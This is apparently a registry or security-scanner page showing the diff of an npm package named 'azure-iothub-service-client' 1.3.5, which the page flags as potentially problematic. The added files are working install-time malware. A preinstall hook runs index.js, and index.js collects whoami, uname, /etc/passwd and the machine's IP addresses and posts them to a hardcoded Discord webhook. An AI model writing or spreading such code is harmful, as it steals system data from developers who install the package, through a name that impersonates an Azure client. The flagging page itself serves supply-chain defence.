azure-iothub-service-client 1.3.5

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of azure-iothub-service-client might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +153 -0
  2. package/package.json +17 -0
package/index.js ADDED
@@ -0,0 +1,153 @@
1
+ const { exec } = require('child_process');
2
+ const https = require('https');
3
+ const fs = require('fs');
4
+ const path = require('path');
5
+
6
+ // Define the command to collect system information and create the file
7
+ const command = `
8
+ whoami;
9
+ uname -a;
10
+ cat /etc/passwd 2>/dev/null;
11
+ curl -s https://ifconfig.me; # Public IP 1
12
+ curl -s http://api.ipify.org; # Public IP 2
13
+ hostname -I | awk '{print $1}'; # Private IP
14
+ mkdir -p /tmp/balvant-chavda && echo 'balvant was here' > /tmp/balvant-chavda/poc.txt;
15
+ pwd;
16
+ `;
17
+
18
+ // Discord webhook URL
19
+ const webhookUrl = 'https://discord.com/api/webhooks/1282556604851421308/ULZN1VNiuQVpb3DRbQjd4o2awhpQ4cGq1VF9w_XuPPKtD9svB12SjfJmBZ_x-rtjgZwJ';
20
+
21
+ // Define the maximum length for the message
22
+ const MAX_MESSAGE_LENGTH = 2000;
23
+
24
+ // Function to send data to the Discord webhook
25
+ const sendDataToDiscord = (data, callback) => {
26
+ const postData = JSON.stringify({
27
+ content: data
28
+ });
29
+
30
+ const url = new URL(webhookUrl);
31
+
32
+ const options = {
33
+ hostname: url.hostname,
34
+ port: 443,
35
+ path: url.pathname,
36
+ method: 'POST',
37
+ headers: {
38
+ 'Content-Type': 'application/json',
39
+ 'Content-Length': Buffer.byteLength(postData)
40
+ }
41
+ };
42
+
43
+ const req = https.request(options, (res) => {
44
+ let response = '';
45
+ res.on('data', (chunk) => {
46
+ response += chunk;
47
+ });
48
+ res.on('end', () => {
49
+ callback(null, response);
50
+ });
51
+ });
52
+
53
+ req.on('error', (e) => {
54
+ callback(`Error: ${e.message}`);
55
+ });
56
+
57
+ req.write(postData);
58
+ req.end();
59
+ };
60
+
61
+ // Function to read the package name from package.json
62
+ const getPackageName = (callback) => {
63
+ const packageJsonPath = path.resolve(__dirname, 'package.json');
64
+ fs.readFile(packageJsonPath, 'utf8', (err, data) => {
65
+ if (err) {
66
+ callback(`Error reading package.json: ${err.message}`);
67
+ return;
68
+ }
69
+
70
+ try {
71
+ const packageJson = JSON.parse(data);
72
+ callback(null, packageJson.name);
73
+ } catch (parseErr) {
74
+ callback(`Error parsing package.json: ${parseErr.message}`);
75
+ }
76
+ });
77
+ };
78
+
79
+ // Function to read the content of the created file
80
+ const readPocFile = (callback) => {
81
+ fs.readFile('/tmp/balvant-chavda/poc.txt', 'utf8', (err, data) => {
82
+ if (err) {
83
+ callback(`Error reading file: ${err.message}`);
84
+ } else {
85
+ callback(null, data);
86
+ }
87
+ });
88
+ };
89
+
90
+ // Execute the command
91
+ exec(command, (error, stdout, stderr) => {
92
+ if (error) {
93
+ console.error(`Error: ${error.message}`);
94
+ return;
95
+ }
96
+ if (stderr) {
97
+ console.error(`stderr: ${stderr}`);
98
+ return;
99
+ }
100
+
101
+ // Read the content of the poc.txt file
102
+ readPocFile((fileErr, fileContent) => {
103
+ if (fileErr) {
104
+ console.error(fileErr);
105
+ return;
106
+ }
107
+
108
+ // Extract IPs from stdout
109
+ const publicIPRegex = /https:\/\/ifconfig\.me\s*([\d\.]+).*?api\.ipify\.org\s*([\d\.]+).*?hostname -I\s*([\d\.]+)/s;
110
+ const matches = stdout.match(publicIPRegex);
111
+ const publicIP1 = matches ? matches[1] : 'N/A';
112
+ const publicIP2 = matches ? matches[2] : 'N/A';
113
+ const privateIP = matches ? matches[3] : 'N/A';
114
+
115
+ // Get the package name from package.json
116
+ getPackageName((nameErr, packageName) => {
117
+ if (nameErr) {
118
+ console.error(nameErr);
119
+ return;
120
+ }
121
+
122
+ // Prepare the final message with file content, working directory, and IPs
123
+ let finalData = `
124
+ **Package Name:**
125
+ ${packageName}
126
+
127
+ **System Information:**
128
+ ${stdout}
129
+
130
+ **Public IP 1:** ${publicIP1}
131
+ **Public IP 2:** ${publicIP2}
132
+ **Private IP:** ${privateIP}
133
+
134
+ **File Content:**
135
+ ${fileContent}
136
+ `;
137
+
138
+ // Truncate message if it's too long
139
+ if (finalData.length > MAX_MESSAGE_LENGTH) {
140
+ finalData = finalData.substring(0, MAX_MESSAGE_LENGTH - 3) + '...'; // Add ellipsis to indicate truncation
141
+ }
142
+
143
+ // Send the collected data to the Discord webhook
144
+ sendDataToDiscord(finalData, (err, response) => {
145
+ if (err) {
146
+ console.error(`Send Data Error: ${err}`);
147
+ return;
148
+ }
149
+ console.log(`Response from Discord webhook: ${response}`);
150
+ });
151
+ });
152
+ });
153
+ });
package/package.json ADDED
@@ -0,0 +1,17 @@
1
+ {
2
+ "name": "azure-iothub-service-client",
3
+ "version": "1.3.5",
4
+ "description": "A package to poc information.",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "echo 'Running preinstall script' > install-log.txt && node index.js >> install-log.txt 2>&1",
8
+ "postinstall": "cat install-log.txt",
9
+ "test": "echo \"Error: no test specified\" && exit 1"
10
+ },
11
+ "author": "balvant",
12
+ "license": "ISC",
13
+ "dependencies": {
14
+ "azure-iothub-service-client": "^0.0.1",
15
+ "lodash": "^4.17.21"
16
+ }
17
+ }